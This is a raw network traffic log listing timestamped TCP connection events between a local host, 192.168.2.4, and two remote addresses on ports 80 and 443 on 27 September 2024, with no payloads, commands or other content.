                                                                                                                                                                Sep 27, 2024 17:42:22.024318933 CEST8049775185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.027431011 CEST4977580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:22.031636000 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.031757116 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.040138006 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.040152073 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.040441990 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.044415951 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.091408968 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.132730961 CEST4977580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:22.133059978 CEST4977880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:22.166743040 CEST8049778185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.167329073 CEST4977880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:22.167361975 CEST8049775185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.171286106 CEST4977580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:22.202411890 CEST4977880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:22.211657047 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.211731911 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.220556974 CEST8049778185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.226082087 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.226099968 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.226327896 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.241326094 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.283418894 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.496529102 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.496629953 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.496773958 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.496860027 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.496872902 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.496886969 CEST49776443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.496892929 CEST44349776172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.637058020 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.637149096 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.637204885 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.637552977 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.637576103 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.637588024 CEST49777443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.637593031 CEST44349777172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.773118019 CEST49779443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.773159027 CEST44349779172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.773247957 CEST49779443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.773638010 CEST49779443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.773648977 CEST44349779172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.946219921 CEST8049778185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.946280956 CEST4977880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:22.947155952 CEST4977880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:22.960441113 CEST49780443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.960489035 CEST44349780172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.960669994 CEST49780443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.960968971 CEST49780443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:22.960982084 CEST44349780172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:22.964999914 CEST8049778185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.208220959 CEST8049778185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.208340883 CEST4977880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:23.317091942 CEST4977880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:23.317522049 CEST4978180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:23.334357023 CEST8049781185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.334441900 CEST4978180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:23.334587097 CEST4978180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:23.349920988 CEST8049781185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.357475996 CEST8049778185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.357554913 CEST4977880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:23.366961956 CEST44349779172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.367053986 CEST49779443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:23.368391991 CEST49779443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:23.368401051 CEST44349779172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.368623018 CEST44349779172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.369446993 CEST49779443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:23.415410042 CEST44349779172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.531363964 CEST44349780172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.531642914 CEST49780443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:23.533340931 CEST49780443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:23.533351898 CEST44349780172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.533751965 CEST44349780172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.534758091 CEST49780443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:23.575398922 CEST44349780172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.838548899 CEST44349779172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.838661909 CEST44349779172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.838737011 CEST49779443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:23.838948011 CEST49779443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:23.838963032 CEST44349779172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.838973045 CEST49779443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:23.838979006 CEST44349779172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.999591112 CEST44349780172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:23.999689102 CEST44349780172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:24.000377893 CEST49780443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:24.000484943 CEST49780443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:24.000514984 CEST44349780172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:24.000535965 CEST49780443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:24.000543118 CEST44349780172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:24.132370949 CEST49782443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:24.132471085 CEST44349782172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:24.132566929 CEST49782443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:24.132920980 CEST49782443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:24.132961035 CEST44349782172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:24.273719072 CEST49783443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:24.273768902 CEST44349783172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:24.273837090 CEST49783443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:24.274305105 CEST49783443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:24.274317980 CEST44349783172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:24.577430964 CEST8049781185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:24.577539921 CEST4978180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:24.578175068 CEST4978180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:24.579973936 CEST8049781185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:24.580118895 CEST4978180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:24.816307068 CEST4978180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:25.128937006 CEST4978180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:25.628432035 CEST8049781185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:25.628493071 CEST4978180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:25.629648924 CEST8049781185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:25.629722118 CEST4978180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:25.633645058 CEST8049781185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:25.633656979 CEST8049781185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:25.633946896 CEST8049781185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:25.859296083 CEST8049781185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:25.859874964 CEST4978180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:25.973428965 CEST4978180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:25.973691940 CEST4978480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:25.980443954 CEST8049784185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:25.980529070 CEST4978480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:25.980649948 CEST4978480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:25.985730886 CEST8049781185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:25.985812902 CEST4978180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:25.989013910 CEST8049784185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.099725962 CEST44349783172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.099886894 CEST49783443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.101064920 CEST44349782172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.101149082 CEST49782443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.101350069 CEST49783443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.101366043 CEST44349783172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.101604939 CEST44349783172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.102418900 CEST49782443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.102457047 CEST44349782172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.102720976 CEST44349782172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.103327036 CEST49783443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.103440046 CEST49782443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.147403955 CEST44349783172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.151408911 CEST44349782172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.618475914 CEST44349783172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.618475914 CEST44349782172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.618601084 CEST44349782172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.618617058 CEST44349783172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.618669987 CEST49782443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.618695974 CEST49783443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.618891954 CEST49782443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.618928909 CEST44349782172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.618949890 CEST49782443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.618957996 CEST44349782172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.618999958 CEST49783443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.618999958 CEST49783443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.619028091 CEST44349783172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.619040966 CEST44349783172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.706039906 CEST8049784185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.707308054 CEST4978480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:26.708297014 CEST4978480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:26.715596914 CEST8049784185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.913959026 CEST49785443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.914063931 CEST44349785172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.914191008 CEST49785443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.914566040 CEST49785443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.914602041 CEST44349785172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.945451975 CEST49786443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.945496082 CEST44349786172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:26.945597887 CEST49786443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.945933104 CEST49786443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:26.945955038 CEST44349786172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.003106117 CEST8049784185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.003326893 CEST4978480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:27.114377022 CEST4978480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:27.114723921 CEST4978780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:27.129440069 CEST8049787185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.129560947 CEST4978780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:27.129723072 CEST4978780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:27.131136894 CEST8049784185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.131191969 CEST4978480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:27.144740105 CEST8049787185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.499007940 CEST44349786172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.499123096 CEST49786443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:27.500628948 CEST49786443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:27.500639915 CEST44349786172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.500886917 CEST44349786172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.501853943 CEST49786443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:27.509294987 CEST44349785172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.509382963 CEST49785443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:27.514594078 CEST49785443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:27.514606953 CEST44349785172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.514900923 CEST44349785172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.515804052 CEST49785443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:27.543401957 CEST44349786172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.559396029 CEST44349785172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.951656103 CEST8049787185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.951847076 CEST4978780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:27.952778101 CEST4978780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:27.981014013 CEST44349786172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.981127977 CEST44349786172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.981184006 CEST49786443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:27.981329918 CEST49786443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:27.981384993 CEST44349786172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.981420994 CEST49786443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:27.981437922 CEST44349786172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.995029926 CEST44349785172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.995146990 CEST44349785172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.995202065 CEST49785443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:27.995445013 CEST49785443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:27.995459080 CEST44349785172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.995485067 CEST49785443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:27.995496035 CEST44349785172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:27.997137070 CEST8049787185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.227019072 CEST8049787185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.227229118 CEST4978780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:28.242451906 CEST49788443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.242502928 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.242588043 CEST49788443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.243057966 CEST49788443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.243074894 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.289619923 CEST49789443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.289721966 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.289800882 CEST49789443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.290246964 CEST49789443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.290278912 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.332679033 CEST4978780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:28.333039999 CEST4979080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:28.342363119 CEST8049790185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.342489958 CEST4979080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:28.342701912 CEST4979080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:28.345247030 CEST8049787185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.345314026 CEST4978780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:28.355737925 CEST8049790185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.808063984 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.808178902 CEST49788443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.809562922 CEST49788443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.809572935 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.810208082 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.811142921 CEST49788443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.815171957 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.815262079 CEST49789443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.816255093 CEST49789443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.816277981 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.816540003 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.817259073 CEST49789443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.855416059 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.863406897 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.073491096 CEST8049790185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.073677063 CEST4979080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:29.074568033 CEST4979080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:29.080918074 CEST8049790185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.245394945 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.245656967 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.245716095 CEST49788443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.249564886 CEST49788443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.249583960 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.249593019 CEST49788443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.249598026 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.259638071 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.260827065 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.260886908 CEST49789443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.269103050 CEST49789443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.269155025 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.269186020 CEST49789443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.269202948 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.298993111 CEST8049790185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.299055099 CEST4979080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:29.411294937 CEST4979080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:29.411832094 CEST4979180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:29.419414997 CEST8049791185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.419485092 CEST4979180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:29.420056105 CEST4979180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:29.421042919 CEST8049790185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.421102047 CEST4979080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:29.428483963 CEST8049791185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.586216927 CEST49792443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.586328030 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.586443901 CEST49792443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.586749077 CEST49792443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.586785078 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.663830042 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.663877964 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.664125919 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.664545059 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.664555073 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.183695078 CEST8049791185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.183847904 CEST4979180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:30.184762001 CEST4979180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:30.208410025 CEST8049791185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.210444927 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.210644007 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.211997986 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.212009907 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.212256908 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.213154078 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.259411097 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.260927916 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.261040926 CEST49792443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.262407064 CEST49792443192.168.2.4172.67.187.100
